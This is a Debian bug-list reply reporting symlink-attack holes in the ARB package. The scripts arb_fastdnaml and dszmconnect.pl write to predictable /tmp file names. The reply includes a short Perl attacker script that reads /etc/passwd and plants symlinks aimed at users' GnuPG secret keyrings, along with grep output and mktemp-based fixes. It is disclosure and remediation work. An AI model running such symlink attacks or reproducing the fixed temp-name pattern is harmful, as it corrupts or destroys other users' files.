On 08:36 Mon 22 Sep , Andreas Tille wrote:
> Hi,
>
> unfortunately I completely missed this bug because I had a "relaxing from
> DebConf" vacation and it must have somehow vanished from my mailbox - so sorry
> for caring so late.
>
> Now I had a look at Arb packaging and have to admit I do not really
> understand which issue exactly fulfills the symlink attack problem.
> Could you please be a little bit more specific (provide the output of
> the script for arb) to enable us to fix this problem quickly?
>
> Kind regards and thanks for your QA work

look at full report: http://uvw.ru/report.lenny.txt

if attacker creates symlink /tmp/arb_fdnaml_${USER}_$$ or /tmp/arbdsmz.html
then starting scripts /usr/lib/arb/SH/arb_fastdnaml or
/usr/lib/arb/SH/dszmconnect.pl will lead to data corruption.

example for attacker script:

#!/usr/bin/perl
symlink '/tmp/arbdsmz.html', '/path/to/file';
for my $user ( map { chomp; $_=[split ':', $_]; [$_->[0], $_->[5]] } `cat /etc/passwd` ) {
    symlink "$$user[1]/.gnupg/secring.gpg", "/tmp/arb_fdnaml_$$user[0]_$_" for ($$ .. $$+1000000);
}

use mktemp (1) (with option -t) to create temp files in bash scripts.
use File::Temp module to create temp files in perl scripts.

cut of report:

Package: arb-common
Version: 0.0.20071207.1-4
Filename: pool/non-free/a/arb/arb-common_0.0.20071207.1-4_all.deb

Found error in /usr/lib/arb/SH/arb_fastdnaml:

$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/arb_fastdnaml
#!/bin/sh
tmp=/tmp/arb_fdnaml_${USER}_$$
mv infile $tmp
nice -19 $1 < $tmp &
sig=$!
/bin/echo "$sig $$ \c" >>/tmp/arb_pids_${USER}_${ARB_PID}
wait
# echo $tmp not deleted for debugging purposes
rm -f $tmp
rm -f checkpoint.$sig
mv treefile.$sig treefile

Found error in /usr/lib/arb/SH/dszmconnect.pl:

$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/dszmconnect.pl
</body>
</html>";
open (OUTPUT , "> /tmp/arbdsmz.html") or die "cannot open input file /tmp/arbdsmz.html";
if (scalar(@ARGV) == 0) {print OUTPUT $errordocument; die("no search items given ! 
Give at least one item!");}
##print length(@ARGV)."\n";
--
my $selection_content = 'VAR_DATABASE=bact&VAR_HITS=25&VAR_DSMZITEM='."$item1".'&VAR_DSMZITEM2='."$item2".'&B1=Search';
$req_selection->content($selection_content);
# Pass request to the user agent and get a response back
my $res_selection = $ua_selection -> request($req_selection, '/tmp/arbdsmz.htm');
# Check the outcome of the response
if ($res_selection->is_success) {print $res_selection->content;}
else {die "Bad luck this time, request failed\n";};
open (INPUT , "< /tmp/arbdsmz.htm") or die "cannot open input file /tmp/arbdsmz.htm";
my $htmlcontent;
{
local $/;
--
$htmlcontent =~ s{HREF="}{HREF="http://www.dsmz.de}igm;
$htmlcontent =~ s{HREF=[^"]}{HREF=http://www.dsmz.de/}igm; ##"
print OUTPUT $htmlcontent ;
#exec ('netscape', '/tmp/arbdsmz.html');
print "file:///tmp/arbdsmz.html";
##print "$htmlcontent\n";

--
. ''`.   Dmitry E. Oboukhov
: :’  :  [EMAIL PROTECTED]
`. `~’   GPGKey: 1024D / F8E26537 2006-11-21
  `-     1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
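The mktemp recommendation in the message above, shown next to the fixed-name pattern from the report. This is an added example, not part of the original message and not ARB's code; the function names are hypothetical, and the temp directory is a parameter (an assumption) so the comparison runs in a private sandbox rather than the real /tmp.

```shell
#!/bin/sh
# Added example, not ARB code. All names here are hypothetical.

# Pattern from the report: fixed, guessable name. The redirect follows a
# symlink planted at that name and overwrites whatever it points to.
write_report_legacy() {   # $1 = temp dir, $2 = content
    printf '%s\n' "$2" > "$1/arbdsmz.html"
    printf '%s\n' "$1/arbdsmz.html"
}

# Hardened: mktemp picks an unpredictable name and creates the file
# exclusively with mode 0600, so an existing file or symlink is never reused.
# (On GNU systems "mktemp -t arbdsmz.XXXXXXXXXX" does the same under $TMPDIR.)
write_report_safe() {     # $1 = temp dir, $2 = content
    out=$(mktemp "$1/arbdsmz.XXXXXXXXXX") || return 1
    printf '%s\n' "$2" > "$out"
    printf '%s\n' "$out"   # callers must use this path, not a fixed one
}

# Constructed scenario: a symlink already sits at the predictable name and
# points at a file the script's user cares about.
demo() {
    sandbox=$(mktemp -d) || return 1
    printf 'precious\n' > "$sandbox/victim"
    ln -s "$sandbox/victim" "$sandbox/arbdsmz.html"

    write_report_safe "$sandbox" '<html>ok</html>' > /dev/null
    after_safe=$(cat "$sandbox/victim")      # still the original content
    write_report_legacy "$sandbox" '<html>ok</html>' > /dev/null
    after_legacy=$(cat "$sandbox/victim")    # overwritten through the link

    rm -rf "$sandbox"
    printf 'safe=%s legacy=%s\n' "$after_safe" "$after_legacy"
}

demo
```

On current Linux kernels, fs.protected_symlinks=1 refuses to follow such links in sticky world-writable directories, but scripts should not rely on that setting being enabled.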